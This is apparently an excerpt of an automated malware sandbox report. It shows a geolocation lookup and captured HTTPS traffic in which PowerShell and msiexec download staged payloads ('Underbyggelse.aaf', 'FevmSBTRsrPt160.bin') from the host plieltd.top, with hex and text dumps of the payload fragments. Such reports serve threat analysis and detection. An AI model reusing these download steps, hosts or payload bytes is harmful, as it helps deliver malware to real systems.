                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                                                                                                              Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449730172.67.155.1394436852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-21 06:34:02 UTC172OUTGET /Underbyggelse.aaf HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                              Host: plieltd.top
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              2024-10-21 06:34:02 UTC910INHTTP/1.1 200 OK
                                                                                                                                              Date: Mon, 21 Oct 2024 06:34:02 GMT
                                                                                                                                              Content-Length: 436336
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sat, 19 Oct 2024 21:23:50 GMT
                                                                                                                                              ETag: "6a870-624db09261e12"
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2wN5a7b5Lspvp81IqV5zZL80OfRXRclrT96YjCAP5x%2BESDoV54nrX0V1BAoMwFcdMBs4B8xXhKSb3R0vuxT8S6U%2FYaUVNSPFpPkEcQRTnRD6oQPkg15z9kzWkXFWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8d5f3833aea3485c-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=786&delivery_rate=2271372&cwnd=246&unsent_bytes=0&cid=58df174075638f1c&ts=513&x=0"
                                                                                                                                              2024-10-21 06:34:02 UTC459INData Raw: 36 77 4a 63 64 2b 73 43 6c 73 4f 37 35 6c 77 52 41 48 45 42 6d 2b 73 43 48 39 59 44 58 43 51 45 63 51 47 62 36 77 4c 6f 32 37 6d 30 41 44 65 53 63 51 47 62 36 77 4c 50 61 34 48 78 47 48 69 56 56 58 45 42 6d 2b 73 43 37 6b 53 42 77 56 53 48 58 54 68 78 41 5a 76 72 41 75 4d 4d 36 77 4b 39 67 75 73 43 57 65 47 36 4a 43 4f 42 45 65 73 43 76 70 78 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 6e 58 79 4a 46 41 76 72 41 68 50 78 63 51 47 62 30 65 4c 72 41 6e 30 49 36 77 4b 7a 6a 59 50 42 42 4f 73 43 46 67 62 72 41 75 47 2b 67 66 6e 61 6c 58 73 46 66 4d 72 72 41 71 78 6e 36 77 4c 57 6c 49 74 45 4a 41 54 72 41 6f 71 52 36 77 4b 6e 4f 6f 6e 44 36 77 4a 71 68 33 45 42 6d 34 48 44 6e 6d 68 43 42 48 45 42 6d 33 45 42 6d 37 72 62 49 48 74 36 63 51 47
                                                                                                                                              Data Ascii: 6wJcd+sClsO75lwRAHEBm+sCH9YDXCQEcQGb6wLo27m0ADeScQGb6wLPa4HxGHiVVXEBm+sC7kSBwVSHXThxAZvrAuMM6wK9gusCWeG6JCOBEesCvpxxAZtxAZtxAZsxynEBm+sCnXyJFAvrAhPxcQGb0eLrAn0I6wKzjYPBBOsCFgbrAuG+gfnalXsFfMrrAqxn6wLWlItEJATrAoqR6wKnOonD6wJqh3EBm4HDnmhCBHEBm3EBm7rbIHt6cQG
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 42 6d 31 50 72 41 6e 32 63 36 77 4a 7a 51 57 70 41 63 51 47 62 36 77 4a 79 68 49 6e 72 63 51 47 62 63 51 47 62 78 34 4d 41 41 51 41 41 41 41 43 51 42 65 73 43 6e 71 33 72 41 73 49 62 67 63 4d 41 41 51 41 41 36 77 49 2b 38 75 73 43 74 71 64 54 36 77 49 70 6d 4f 73 43 72 76 53 4a 36 2b 73 43 69 4c 42 78 41 5a 75 4a 75 77 51 42 41 41 42 78 41 5a 76 72 41 70 35 51 67 63 4d 45 41 51 41 41 36 77 4b 70 75 33 45 42 6d 31 4e 78 41 5a 76 72 41 73 63 66 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 56 78 41 5a 76 72 41 6f 77 47 4d 66 62 72 41 6d 68 32 63 51 47 62 4d 63 6c 78 41 5a 76 72 41 6c 56 5a 69 78 72 72 41 6e 34 6d 63 51 47 62 51 58 45 42 6d 33 45 42 6d 7a 6b 63 43 6e 58 30 63 51 47 62 36 77 4c 4c 78 55 62 72 41 76 42 74 63 51 47 62 67 48 77 4b 2b 37 68 31 33 75
                                                                                                                                              Data Ascii: Bm1PrAn2c6wJzQWpAcQGb6wJyhInrcQGbcQGbx4MAAQAAAACQBesCnq3rAsIbgcMAAQAA6wI+8usCtqdT6wIpmOsCrvSJ6+sCiLBxAZuJuwQBAABxAZvrAp5QgcMEAQAA6wKpu3EBm1NxAZvrAscfav9xAZtxAZuDwgVxAZvrAowGMfbrAmh2cQGbMclxAZvrAlVZixrrAn4mcQGbQXEBm3EBmzkcCnX0cQGb6wLLxUbrAvBtcQGbgHwK+7h13u
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 46 37 69 70 36 78 2b 37 6a 66 42 30 54 34 70 56 6e 48 77 30 79 5a 7a 31 73 51 45 6b 30 71 54 38 55 50 44 42 53 69 34 4a 6e 50 5a 65 71 33 6a 59 68 45 57 6e 32 5a 62 76 42 62 41 53 76 47 45 63 2b 79 42 69 64 67 6d 71 44 62 61 72 53 47 4c 45 51 49 4d 6e 50 49 30 51 51 56 7a 79 4c 50 56 35 64 31 4c 56 64 77 50 36 37 51 6c 51 4b 4a 56 5a 34 2f 75 63 77 34 39 72 63 34 72 45 54 5a 33 73 35 41 4c 45 6f 76 35 46 68 54 79 76 36 6e 66 31 5a 50 4e 57 46 44 43 6f 39 69 55 48 39 37 38 72 39 41 4e 48 46 56 49 63 57 56 47 63 39 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                              Data Ascii: F7ip6x+7jfB0T4pVnHw0yZz1sQEk0qT8UPDBSi4JnPZeq3jYhEWn2ZbvBbASvGEc+yBidgmqDbarSGLEQIMnPI0QQVzyLPV5d1LVdwP67QlQKJVZ4/ucw49rc4rETZ3s5ALEov5FhTyv6nf1ZPNWFDCo9iUH978r9ANHFVIcWVGc9QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 41 31 66 57 34 68 67 71 6a 41 46 42 30 4e 65 50 49 5a 45 78 46 4b 30 38 71 62 33 41 79 5a 66 57 2f 47 39 64 46 74 31 44 56 76 35 30 48 5a 7a 36 61 4e 45 6f 79 33 59 65 76 53 6e 7a 4b 51 2f 78 55 49 6a 73 39 74 67 59 55 36 2b 79 67 5a 54 68 43 6d 43 30 6c 39 6b 41 79 34 74 39 71 50 4e 59 67 2f 36 7a 47 73 4c 55 49 47 48 47 38 6e 4e 66 30 76 69 70 7a 4f 30 62 67 73 72 35 61 52 49 6e 41 4a 43 4f 62 51 72 7a 4a 6c 63 6b 30 64 4e 32 57 32 71 4e 45 38 41 4a 63 71 64 33 62 68 30 51 4c 5a 49 68 39 44 51 64 64 6a 50 72 39 6c 38 6f 4e 76 75 33 49 44 63 65 59 55 6c 73 52 4f 56 49 36 46 33 2b 63 74 59 6c 72 35 6b 6f 38 56 30 68 58 58 6c 69 79 51 72 55 42 62 78 2f 45 33 66 30 66 62 37 6f 55 6e 57 48 66 47 56 42 6d 6b 43 70 39 43 6f 30 53 30 73 30 47 35 39 4b 6e 32 52
                                                                                                                                              Data Ascii: A1fW4hgqjAFB0NePIZExFK08qb3AyZfW/G9dFt1DVv50HZz6aNEoy3YevSnzKQ/xUIjs9tgYU6+ygZThCmC0l9kAy4t9qPNYg/6zGsLUIGHG8nNf0vipzO0bgsr5aRInAJCObQrzJlck0dN2W2qNE8AJcqd3bh0QLZIh9DQddjPr9l8oNvu3IDceYUlsROVI6F3+ctYlr5ko8V0hXXliyQrUBbx/E3f0fb7oUnWHfGVBmkCp9Co0S0s0G59Kn2R
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 78 4f 55 36 4a 30 63 36 56 66 44 33 76 51 64 67 68 77 72 4a 53 6b 4c 64 68 39 39 4b 44 4d 2b 6e 42 70 4a 70 76 6b 4b 42 75 78 4b 36 78 7a 37 74 36 4a 67 63 56 78 59 77 74 51 67 56 70 37 63 4d 66 70 31 5a 68 54 72 41 79 66 4a 62 61 68 63 73 67 75 72 50 52 30 49 51 70 39 4f 65 4a 6f 30 67 47 50 4e 35 31 6a 2f 2f 65 56 58 41 36 30 73 4b 79 6e 30 6b 78 4a 78 39 46 46 6e 65 4b 31 68 61 4d 77 5a 62 69 49 4d 4c 56 61 4f 65 2f 42 4b 79 65 44 54 65 5a 58 6c 48 37 58 46 5a 41 4a 72 59 30 39 42 6c 6c 30 68 58 57 61 2b 6e 67 53 55 4f 68 58 6b 6c 7a 4e 65 7a 72 76 77 39 37 53 2b 71 6e 39 48 72 50 47 30 65 7a 6b 42 73 52 4d 4d 4c 76 58 34 34 39 56 34 2b 76 76 6b 49 6a 57 48 54 66 42 45 74 62 6e 4d 4b 50 4d 71 53 49 70 48 51 64 67 79 45 38 56 4d 4a 4d 43 5a 6f 32 76 7a
                                                                                                                                              Data Ascii: xOU6J0c6VfD3vQdghwrJSkLdh99KDM+nBpJpvkKBuxK6xz7t6JgcVxYwtQgVp7cMfp1ZhTrAyfJbahcsgurPR0IQp9OeJo0gGPN51j//eVXA60sKyn0kxJx9FFneK1haMwZbiIMLVaOe/BKyeDTeZXlH7XFZAJrY09Bll0hXWa+ngSUOhXklzNezrvw97S+qn9HrPG0ezkBsRMMLvX449V4+vvkIjWHTfBEtbnMKPMqSIpHQdgyE8VMJMCZo2vz
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 69 33 35 31 57 77 6d 63 2f 77 7a 50 39 30 62 74 4e 49 49 5a 2f 66 44 64 55 33 4b 6e 36 56 4e 36 79 56 74 34 42 32 30 73 77 75 33 71 48 6d 46 43 54 4d 6f 72 75 6e 50 57 67 43 5a 64 56 55 52 62 2b 68 7a 45 78 6a 78 2b 2f 72 4b 62 7a 6e 6d 39 52 45 43 68 72 4a 50 33 46 42 49 70 35 70 72 51 47 77 54 43 6a 34 6c 44 7a 4f 31 44 73 42 4f 79 65 33 71 57 4e 79 45 70 75 4f 4e 41 35 2b 53 62 4c 47 35 70 70 69 6e 6d 44 65 34 79 77 34 39 6f 4a 38 62 4e 52 6e 4b 49 4f 4e 6c 38 4a 6c 39 42 72 79 43 50 2b 42 58 52 47 55 62 58 38 41 4e 42 72 45 4e 6f 76 6c 48 52 65 30 69 62 57 74 39 69 54 32 6b 2f 2b 6f 46 34 39 45 77 41 44 53 76 52 43 50 31 75 6c 45 4a 56 7a 6a 52 37 5a 65 79 74 57 71 6c 6c 78 2f 66 47 78 30 6c 6a 4e 34 65 6c 65 64 66 46 51 71 57 66 4d 67 44 44 59 34 61
                                                                                                                                              Data Ascii: i351Wwmc/wzP90btNIIZ/fDdU3Kn6VN6yVt4B20swu3qHmFCTMorunPWgCZdVURb+hzExjx+/rKbznm9REChrJP3FBIp5prQGwTCj4lDzO1DsBOye3qWNyEpuONA5+SbLG5ppinmDe4yw49oJ8bNRnKIONl8Jl9BryCP+BXRGUbX8ANBrENovlHRe0ibWt9iT2k/+oF49EwADSvRCP1ulEJVzjR7ZeytWqllx/fGx0ljN4eledfFQqWfMgDDY4a
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 52 35 55 36 76 38 36 46 71 34 4c 2b 30 6b 48 2f 68 79 59 62 57 61 6f 46 68 4c 74 34 39 35 61 49 6d 38 65 54 4e 49 6a 45 48 52 6f 2f 6d 50 55 34 6c 6c 74 77 6a 56 4f 63 39 61 4c 65 6f 36 49 77 2f 4b 44 33 73 56 45 5a 56 71 4e 49 48 55 43 4e 55 35 7a 31 52 33 69 37 70 62 35 51 67 4e 47 78 51 68 34 64 65 72 38 79 2b 44 5a 31 4c 7a 56 49 2f 32 55 6d 56 49 34 65 6e 6a 2b 6c 32 4f 4a 4f 47 70 6e 6d 55 74 55 33 51 4a 79 6b 6a 77 72 30 45 48 50 74 53 41 31 61 2f 6d 42 55 43 7a 66 31 30 42 6e 4a 73 31 47 63 66 66 79 6c 44 61 4d 50 33 41 54 54 54 64 42 71 64 4a 32 78 34 33 52 33 41 41 68 61 74 39 42 71 71 50 67 6e 46 71 51 74 32 48 33 38 67 4d 7a 36 63 47 41 74 6d 69 66 50 7a 72 62 39 6f 71 69 6b 39 50 44 56 58 4b 79 4e 44 63 4b 36 54 74 79 67 39 37 46 52 36 54 62
                                                                                                                                              Data Ascii: R5U6v86Fq4L+0kH/hyYbWaoFhLt495aIm8eTNIjEHRo/mPU4lltwjVOc9aLeo6Iw/KD3sVEZVqNIHUCNU5z1R3i7pb5QgNGxQh4der8y+DZ1LzVI/2UmVI4enj+l2OJOGpnmUtU3QJykjwr0EHPtSA1a/mBUCzf10BnJs1GcffylDaMP3ATTTdBqdJ2x43R3AAhat9BqqPgnFqQt2H38gMz6cGAtmifPzrb9oqik9PDVXKyNDcK6Ttyg97FR6Tb
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 70 51 6c 45 4a 46 33 65 5a 41 2f 76 50 49 4f 5a
                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApQlEJF3eZA/vPIOZ
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 66 70 77 5a 70 6b 35 67 30 35 6d 56 52 58 66 59 4c 54 50 62 33 49 6d 76 4b 75 53 73 31 48 67 35 4f 4e 2b 58 78 71 56 62 59 53 43 75 4e 76 31 33 65 71 7a 54 70 59 38 35 44 39 67 69 34 70 5a 41 68 4e 71 36 71 47 7a 47 73 4c 70 41 48 75 4f 51 34 33 36 7a 6b 64 77 5a 58 50 54 45 47 44 6e 55 6f 4f 4c 54 69 31 31 61 78 62 78 56 59 34 4a 65 68 2f 4d 47 57 34 6d 41 44 36 33 48 53 31 64 51 4b 70 43 37 52 6a 51 50 46 51 6e 50 58 69 36 68 55 33 33 2b 34 64 42 73 59 64 68 64 41 77 75 75 70 62 78 38 73 56 35 68 49 39 59 39 72 4c 64 35 4b 75 66 62 54 76 69 4a 4e 45 55 58 64 35 5a 73 30 62 65 42 51 6a 42 56 36 6e 4f 6b 61 69 33 58 2b 6a 74 38 76 72 72 78 30 55 39 76 64 37 76 78 4c 6e 42 43 6e 47 61 73 41 49 70 65 35 2b 54 4a 33 33 6c 55 43 41 48 63 77 4e 6d 50 58 68 36
                                                                                                                                              Data Ascii: fpwZpk5g05mVRXfYLTPb3ImvKuSs1Hg5ON+XxqVbYSCuNv13eqzTpY85D9gi4pZAhNq6qGzGsLpAHuOQ436zkdwZXPTEGDnUoOLTi11axbxVY4Jeh/MGW4mAD63HS1dQKpC7RjQPFQnPXi6hU33+4dBsYdhdAwuupbx8sV5hI9Y9rLd5KufbTviJNEUXd5Zs0beBQjBV6nOkai3X+jt8vrrx0U9vd7vxLnBCnGasAIpe5+TJ33lUCAHcwNmPXh6
                                                                                                                                              2024-10-21 06:34:02 UTC1369INData Raw: 30 6e 76 4a 59 30 4c 44 52 2b 35 49 41 44 37 35 51 61 6e 69 78 65 52 71 53 2f 66 44 4b 62 49 71 63 48 63 47 56 45 41 64 71 65 67 49 6e 65 4c 37 69 54 6e 52 43 65 57 56 67 2b 64 42 76 78 34 7a 75 69 6e 52 61 4e 6b 68 74 50 64 69 6e 38 41 6f 32 6d 67 7a 71 53 4e 37 41 4f 36 45 4b 47 74 5a 62 6c 48 76 46 6c 44 6a 2b 54 2b 58 47 53 57 76 52 31 4f 77 56 43 73 35 50 73 73 43 33 66 54 43 54 78 5a 2f 37 62 42 30 33 32 6c 6b 57 7a 7a 68 72 6f 79 71 32 66 46 73 70 61 65 6e 4c 72 7a 42 56 75 43 71 77 48 54 4b 6a 44 38 71 62 50 6f 33 51 61 76 7a 50 65 52 74 30 52 31 53 72 78 33 6e 51 63 71 61 49 6a 70 46 30 58 7a 35 64 42 4e 54 59 6d 73 58 46 7a 71 43 70 56 57 7a 4e 71 66 6a 2b 6a 54 4a 78 38 35 66 78 79 62 4f 51 63 35 4f 4c 61 61 74 4f 4a 4c 69 64 39 4a 65 37 73 37
                                                                                                                                              Data Ascii: 0nvJY0LDR+5IAD75QanixeRqS/fDKbIqcHcGVEAdqegIneL7iTnRCeWVg+dBvx4zuinRaNkhtPdin8Ao2mgzqSN7AO6EKGtZblHvFlDj+T+XGSWvR1OwVCs5PssC3fTCTxZ/7bB032lkWzzhroyq2fFspaenLrzBVuCqwHTKjD8qbPo3QavzPeRt0R1Srx3nQcqaIjpF0Xz5dBNTYmsXFzqCpVWzNqfj+jTJx85fxybOQc5OLaatOJLid9Je7s7


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.449737172.67.155.1394437104C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-21 06:34:38 UTC175OUTGET /FevmSBTRsrPt160.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                              Host: plieltd.top
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              2024-10-21 06:34:38 UTC998INHTTP/1.1 200 OK
                                                                                                                                              Date: Mon, 21 Oct 2024 06:34:38 GMT
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Content-Length: 494656
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sat, 19 Oct 2024 21:19:22 GMT
                                                                                                                                              ETag: "78c40-624daf93301e5"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sbs7Ko1d%2FbY%2B8P0oe%2BlKhRkCbAGwLcg7gYzH8ssfAZYZxqY7FW%2BPb1FnEQLtrW4g7sAvJNXFzcjcd8ok%2F%2BA3zalbPS%2Fz93OXOUb%2F7fvK%2BvFhxPU5EFbAfQGirWyFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8d5f391618c16c1f-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=813&delivery_rate=2222563&cwnd=251&unsent_bytes=0&cid=2d7875e682168c12&ts=556&x=0"
                                                                                                                                              2024-10-21 06:34:38 UTC371INData Raw: 22 0d a6 00 e9 11 cf 30 4d f4 9e 9c 77 b1 52 bd 2c 45 4a 80 f0 45 77 0b e8 af 7a 5a af 33 82 7d e6 e4 f1 af 98 2a eb 41 27 79 21 20 6e 15 db d4 d4 40 e7 ef ae 15 30 e6 62 00 2c 66 ea 40 e7 d6 a0 ca 09 d6 fc 32 1e 09 d0 d1 00 62 bb 79 17 03 8b d6 b6 7d 77 05 57 90 0d 14 65 2d b5 c8 f6 96 bc d6 aa 25 8e 78 f3 2c c5 07 21 3f 5d af 9a f0 67 61 ea 64 57 a2 5f 8a 99 21 d1 31 16 47 81 02 11 33 88 b0 19 b3 9a ac bd ad c4 90 6f 71 7f 88 3e 21 27 b1 f0 f1 29 df 2a b8 ce ae 91 91 4b 9f f8 b2 13 79 58 e9 80 4f a2 ce fd 2b b2 28 b3 1c 5c 57 24 08 de a7 29 17 cc 14 e5 d8 1f 3d a5 10 e8 f8 17 df de 46 36 00 c4 44 7f a8 58 4a 27 34 7a f3 2b ed a1 89 38 47 4f b0 f9 43 db d6 37 73 8d a3 10 85 0c 12 82 e1 e9 61 b3 1b be 20 11 1d cf 45 75 01 4d 52 03 49 12 71 aa 00 86 0c c3
                                                                                                                                              Data Ascii: "0MwR,EJEwzZ3}*A'y! n@0b,f@2by}wWe-%x,!?]gadW_!1G3oq>!')*KyXO+(\W$)=F6DXJ'4z+8GOC7sa EuMRIq
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 8f 89 27 df 59 de af e4 af df 09 64 88 a7 61 0e ad ae 95 c7 9e 1e 15 2d b2 36 9a 73 03 95 bf e2 da 9b cd 2f 6b 7b a4 fa af d4 b3 bf da 31 4d 35 3e cb 43 cb c0 2d 6f 8d 9a 31 24 bc 96 4a b8 ad 97 2d e5 2c 76 01 b3 94 2e 53 81 b7 81 1c 29 b6 2c 8f c8 4b 28 63 b0 5f 7d ba 39 c3 53 7c 4d c3 e0 cc 4d 7b 50 6e 0f a3 42 f2 60 16 27 3f b3 f8 09 d1 3b 4f 2b 20 f1 91 39 a8 cf d5 e7 22 62 b9 bd cb 99 ed 00 9c 4a d6 0d cd f1 5b a4 f2 dc ff 74 e4 45 29 6e 1c 6e bc d4 d9 b4 d7 a6 01 ae e2 43 7a 94 fe 39 df e4 07 51 9a 47 c3 54 59 07 7b 1f e8 b0 bc bb a5 ad e9 cb 84 8e 9b 1a 8f 78 1f 30 c1 62 b0 1a 57 16 c5 91 1b 82 9f 19 76 e8 9e c7 08 87 09 eb 2b 54 30 11 66 7c 0f 33 df d5 a2 01 e3 c3 f7 a2 3e 90 f3 cb 51 01 0e a0 db 3a a6 92 e4 58 25 1e ba 82 5a 88 b5 f7 0f a4 e2 67
                                                                                                                                              Data Ascii: 'Yda-6s/k{1M5>C-o1$J-,v.S),K(c_}9S|MM{PnB`'?;O+ 9"bJ[tE)nnCz9QGTY{x0bWv+T0f|3>Q:X%Zg
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 88 5e 15 c6 02 f7 dc 3e be 19 6f 4b e1 d9 15 2d bd 97 53 2b b9 94 eb 87 92 c5 9e a6 9e 45 d5 ee a5 12 7f 60 f0 64 d9 44 1f 78 c2 36 4b 82 1e bb 66 b1 67 08 e8 bb 38 40 ae 9a aa 9d 85 bb 53 e5 30 39 09 a5 10 8c 72 2f b7 96 b4 c6 4b 8f 5e f0 15 a9 48 a5 0d 86 9d f4 9e fa 93 86 c2 33 73 dc d5 24 f9 e2 0d 28 e6 5e fb e3 38 00 d8 a8 eb 19 56 f7 3a af 66 98 ba 64 97 ff 7c d6 37 ae f6 c6 b7 80 51 15 91 a2 00 b0 3d 00 d4 c2 e3 42 39 5d 19 94 a8 e1 42 0d 9c 98 7b 92 f6 3c ef ef 60 2f f6 7d 25 01 2d d7 0a ff ed 98 69 76 32 0d 82 36 05 b2 e2 2a c5 89 71 c9 f1 33 08 e7 11 f3 0d 03 c9 0c 03 61 4a b6 d6 f1 ac 0a cb 73 be 67 9c e0 0e 30 5e b0 c0 16 b2 ae 75 68 50 bf 89 be 0e 93 d3 b4 6b 87 99 f6 19 37 f5 51 24 f8 e3 c7 7d 2c d4 84 ac 2c aa d9 72 ed bc 89 55 b2 18 5f fc
                                                                                                                                              Data Ascii: ^>oK-S+E`dDx6Kfg8@S09r/K^H3s$(^8V:fd|7Q=B9]B{<`/}%-iv26*q3aJsg0^uhPk7Q$},,rU_
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: f8 2a 8f 3a ea 34 6e df 3c c3 3e b3 24 77 d8 06 31 27 d9 55 26 53 62 21 90 a8 bd b5 54 75 69 fc 8d 13 43 35 66 3e 32 76 78 2a a2 64 9d 34 58 ee ba 55 d7 29 3c 1e ac a0 19 17 38 23 36 cc 94 f3 95 a8 c1 19 fa 95 f8 e0 5c 6a 07 b1 28 23 f8 93 39 b1 99 82 4d 98 62 82 89 cb ab 27 36 16 15 5b 99 e7 54 90 4b d9 43 7a 5b d6 7a 12 6b 46 15 f9 45 b6 be ba a6 2c 35 99 9c 4b c8 10 ea 6f 0c 58 5d ca 63 38 1b dc 14 1c 69 b4 0f 38 6f 8c 7d 3b ce 1a 3a a1 56 d7 16 49 fb 02 0d a2 eb 0b d7 36 d1 29 81 41 53 48 6e 9e c0 e0 76 dc 34 79 8e 5e 86 de 4d 84 f1 c9 d6 f1 9d fc ef 33 29 3d fb de d6 00 6b 6b 13 87 5a cf 8a 01 a8 17 03 5b 66 c9 38 77 ed 12 bf 4e 14 3c 7b 5d 90 dd 95 bc 8f 27 69 aa 68 1b 3e cd 07 21 b4 18 a3 b7 4e 64 61 ea 6b d3 d8 5e 8a 99 69 52 d9 0f 49 04 74 1e 2c
